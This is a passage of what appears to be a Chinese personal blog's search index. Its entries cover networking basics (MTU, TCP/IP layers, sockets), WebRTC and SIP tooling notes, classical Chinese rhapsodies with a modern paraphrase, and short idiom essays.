734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。\n","permalink":"https://wdd.js.org/network/xwuvyr/","summary":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1942。链路层的这个特性称作MTU, 最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。","title":"2 链路层"},{"content":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”\n","permalink":"https://wdd.js.org/posts/2019/11/wkyqnl/","summary":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”","title":"登徒子好色赋"},{"content":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。\n","permalink":"https://wdd.js.org/posts/2019/11/ck3yzp/","summary":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。","title":"洛神赋"},{"content":"有两种选择,要么被忽悠成韭菜被别人割,要么割别热的韭菜。\n","permalink":"https://wdd.js.org/posts/2019/11/blqt1k/","summary":"有两种选择,要么被忽悠成韭菜被别人割,要么割别热的韭菜。","title":"割韭菜"},{"content":" “狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~\n","permalink":"https://wdd.js.org/posts/2019/11/urkvnz/","summary":"“狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~","title":"朝三暮四"},{"content":" 冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》\n","permalink":"https://wdd.js.org/posts/2019/11/kug5fo/","summary":"冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》","title":"众生鱼肉"},{"content":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。\n","permalink":"https://wdd.js.org/posts/2019/11/gn4aak/","summary":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。","title":"第三种生存"},{"content":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。\n","permalink":"https://wdd.js.org/network/ir1i82/","summary":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。","title":"1 概述"},{"content":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing\n","permalink":"https://wdd.js.org/opensips/tools/homer/","summary":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing","title":"homer: 统一的sip包集中处理工具"},{"content":"1 面向连接和面向非连接的区别? 面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。\n","permalink":"https://wdd.js.org/network/kttu4i/","summary":"1 面向连接和面向非连接的区别? 面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。","title":"技巧1"},{"content":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最长见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!\n","permalink":"https://wdd.js.org/network/base-socket/","summary":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最长见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!","title":"基本套接字API回顾"},{"content":"","permalink":"https://wdd.js.org/posts/2019/11/bhbmum/","summary":"","title":"所有的古镇都是一个样[todo]"},{"content":" 今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。\n","permalink":"https://wdd.js.org/posts/2019/11/gonmzq/","summary":"今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。","title":"买了语雀会员是怎样体验?"},{"content":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候以为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。\nemit \u0026ldquo;peerconnection:setremotedescriptionfailed\u0026rdquo; [error**:DOMException:**** Failed to execute \u0026lsquo;setRemoteDescription\u0026rsquo; on \u0026lsquo;RTCPeerConnection\u0026rsquo;:**** Failed to set remote offer sdp****:**** Called with SDP without DTLS fingerprint.**\n一个完整的SIP INVITE信令。其中a=fingerprint:sha-256字段表示DTLS指纹。\na=fingerprint:sha-256 74:CD:F4:A0:3B:46:01:1C:0C:5D:04:D0:17:E5:A4:A1:04:35:97:1C:34:A3:61:60:79:52:02:F3:05:9E:7D:FE\nSDP: Session Description Protocol SDP协议用来协商两个SIP UA之间能力,例如媒体编解码能力。sdp协议举例。sdp协议的详细介绍可以参考 RFC4566\nv=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Protocol Version (\u0026ldquo;v=\u0026rdquo;) Origin (\u0026ldquo;o=\u0026rdquo;) Session Name (\u0026ldquo;s=\u0026rdquo;) Session Information (\u0026ldquo;i=\u0026rdquo;) URI (\u0026ldquo;u=\u0026rdquo;) Email Address and Phone Number (\u0026ldquo;e=\u0026rdquo; and \u0026ldquo;p=\u0026rdquo;) Connection Data (\u0026ldquo;c=\u0026rdquo;) Bandwidth (\u0026ldquo;b=\u0026rdquo;) Timing (\u0026ldquo;t=\u0026rdquo;) Repeat Times (\u0026ldquo;r=\u0026rdquo;) Time Zones (\u0026ldquo;z=\u0026rdquo;) Encryption Keys (\u0026ldquo;k=\u0026rdquo;) Attributes (\u0026ldquo;a=\u0026rdquo;) Media Descriptions (\u0026ldquo;m=\u0026rdquo;) 加密 WebRTC对安全性是要求非常高的。无论是信令还是与语音流,WebRTC要求信息传递必须加密。\n数据流使用DTLS协议 媒体流使用SRTP JavaScript API getUserMedia():捕捉音频和视频 RTCPeerConnection:在用户之间流式传输音频和视频 RTCDataChannel:在用户之间传输数据 MediaRecorder:录制音频和视频 参考 WebRTC官网 WebRTC中文网 一步一步学习WebRTC A Study of WebRTC Security ","permalink":"https://wdd.js.org/opensips/ch9/notes/","summary":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 